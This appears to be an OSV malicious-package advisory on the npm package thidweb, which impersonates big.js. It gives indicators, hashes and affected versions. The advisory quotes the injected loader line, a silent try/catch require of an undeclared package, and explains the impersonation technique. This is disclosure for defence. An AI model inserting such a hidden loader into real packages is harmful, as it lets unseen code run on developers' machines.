MAL-2026-6343

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6343

Published

2026-06-23T20:01:26Z

Modified

2026-06-23T21:01:21.969570772Z

Summary

Malicious code in thidweb (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)

Package is published as thidweb but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 # big.js; big.js header big.js v7.0.1; package.json repository url https://github.com/MikeMcl/big.js.git). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. The same block is present in big.mjs. parket-slot is not declared in package.json dependencies; the only declared dependency is log-taker@^0.0.9, which upstream big.js does not require (upstream is dependency-free). Any developer who installs thidweb (mistaking it for big.js) and imports it executes whatever code parket-slot ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d",
            "source": "amazon-inspector",
            "import_time": "2026-06-23T20:48:30.715119057Z",
            "id": "IN-MAL-2026-007356",
            "versions": [
                "0.0.8"
            ],
            "modified_time": "2026-06-23T20:01:26Z"
        }
    ]
}

References

https://www.npmjs.com/package/thidweb/v/0.0.8

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / thidweb

Package

Name: thidweb; View open source insights on deps.dev
Purl: pkg:npm/thidweb

Affected ranges

Affected versions

0.*

0.0.8

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json"

indicators

{
    "package_integrity": [
        {
            "filename": "thidweb-0.0.8.tgz",
            "hashes": {
                "sha1": "04e7457d06345536d4bd78c9e0a34e5598ac5ecc",
                "sha512_sri": "sha512-YU0zyLSumbR4vpqZ5emFW3M5I38jX4DtdP/xKPTNoj97robUvHd46iJvHKi5lyJjC77yYBJjtQRtOFmCnmGUXw=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
            "sha256": "5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace",
            "path": "big.js"
        },
        {
            "tlsh": "59213463c9a59da70af85ba47c6c03aef1151b1f00a04c17b07b130c4f3345b2096b7d",
            "path": "package.json",
            "sha256": "b45b4819897cf8421385b6cba4fb1ab287a762cc7d979c79041298202d02d7e4"
        }
    ]
}

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]